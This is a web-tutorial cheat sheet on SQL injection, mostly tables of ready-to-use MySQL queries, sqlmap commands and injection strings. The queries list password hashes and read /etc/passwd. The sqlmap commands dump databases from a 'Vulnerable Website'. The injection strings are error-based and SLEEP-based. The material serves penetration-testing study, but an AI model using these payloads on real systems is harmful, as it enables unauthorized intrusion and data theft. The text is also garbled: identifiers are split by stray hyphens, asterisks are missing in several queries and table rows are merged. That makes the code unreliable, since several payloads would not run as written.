Open In App

SQL Injection Cheat Sheet

Improve
Improve
Like Article
Like
Save
Share
Report

SQL injection is a common vulnerability in web applications that can be exploited to inject malicious SQL code into a database. An attacker who knows the correct syntax for injecting SQL commands into an application’s back end could use this to execute unauthorized or destructive actions on behalf of the target user. An ethical hacker should always test for and identify potential SQL injection vulnerabilities, as they are one of the most frequently used attacks in today’s digital world.

SQL Injection Cheat Sheet

 

The whole purpose of the Cheat Sheet is to provide you with some quick, accurate ready-to-use commands and necessary Sqlmap queries to help you with SQL Injections.

Basics of SQL: 

S. No.

Parameters

SQL Queries/Examples

1.

Version

SELECT @@version;

2.

Comments

/ / or #

3.

Current user

SELECT user(); || SELECT system­_user()

4.

List users

SELECT user FROM mysql.u­ser;

5.

List password hashes

SELECT host, user, password FROM mysql.u­ser;

6.

Current Database

SELECT database()

7.

List databases

SELECT schema­_name FROM inform­ati­on_­sch­ema.sc­hemata; || SELECT distin­ct(db) FROM mysql.db

8.

List tables

SELECT table_­sch­ema­,ta­ble­_name FROM inform­ati­on_­sch­ema.tables WHERE table_­schema != ‘mysql’ AND table_­schema != ‘infor­mat­ion­_sc­hema’

9.

List columns

SELECT table_­schema, table_­name, column­_name FROM inform­ati­on_­sch­ema.co­lumns WHERE table_­schema != ‘mysql’ AND table_­schema != ‘infor­mat­ion­_sc­hema’

10.

Find Tables From Column Name

SELECT table_­schema, table_name FROM inform­ati­on_­sch­ema.co­lumns WHERE column­_name = ‘usern­ame’;

11.

Time delay

SELECT BENCHM­ARK­(10­000­00,­MD5­(‘A’)); SELECT SLEEP(5); # >= 5.0.12

12.

Local File Access

UNION ALL SELECT LOAD_F­ILE­(‘/­etc­/pa­sswd’) 

13.

Hostna­me/IP Address

SELECT @@host­name;

14.

Create user

CREATE USER test1 IDENTIFIED BY ‘pass1′;

15.

Delete user Location of the db file

SELECT @@datadir;

Basic Commands of SQLMap:

S. No

Parameters

SQLMap Queries Syntax

1.

To Attack a database of a Vulnerable Website

sqlmap -u “Vulnerable URL” –dbs

2.

To get tables from a database of Vulnerable Website

sqlmap -u “Vulnerable URL” –table -D [Name of database]

3.

To get columns of a table on the Vulnerable Website

sqlmap -u “Vulnerable URL” –columns -D [Name of database] -T [table name]

4.

To dump all values of the table of Vulnerable Website

sqlmap -u “Vulnerable URL” –dump -D [Name of database] -T [table name]

Manually Attacks on SQLMap:

S. No. Manually Attack Parameters SQLMap Queries/Examples
1. Quick detect INTEGERS select 1 and row(1,­1)>­(select count(),conc­at(­CON­CAT­(@@­VER­SIO­N),­0x3­a,f­loo­r(r­and()2))x from (select 1 union select 2)a group by x limit 1))
2. Quick detect STRINGS ‘+(select 1 and row(1,­1)>­(select count(),conc­at(­CON­CAT­(@@­VER­SIO­N),­0x3­a,f­loo­r(r­and()2))x from (select 1 union select 2)a group by x limit 1))+’
3. Clear SQL Test produc­t.p­hp?id=4 produc­t.p­hp?­id=5-1 produc­t.p­hp?id=4 OR 1=1 produc­t.p­hp?­id=-1 OR 17-7=10
4. Blind SQL Injection SLEEP(­25)– SELECT BENCHM­ARK­(10­000­00,­MD5­(‘A’));
5. Real world sample Produc­tID=1 OR SLEEP(­25)=0 LIMIT 1– Produc­tID=1) OR SLEEP(­25)=0 LIMIT 1– Produc­tID=1′ OR SLEEP(­25)=0 LIMIT 1– Produc­tID=1′) OR SLEEP(­25)=0 LIMIT 1– Produc­tID=1)) OR SLEEP(­25)=0 LIMIT 1– Produc­tID­=SELECT SLEEP(­25)–

You can also learn more about SQL Injections from the article: How to use SQLMAP to test a website for SQL Injection vulnerability.



Last Updated : 07 Jun, 2023
Like Article
Save Article
Previous
Next
Share your thoughts in the comments
Similar Reads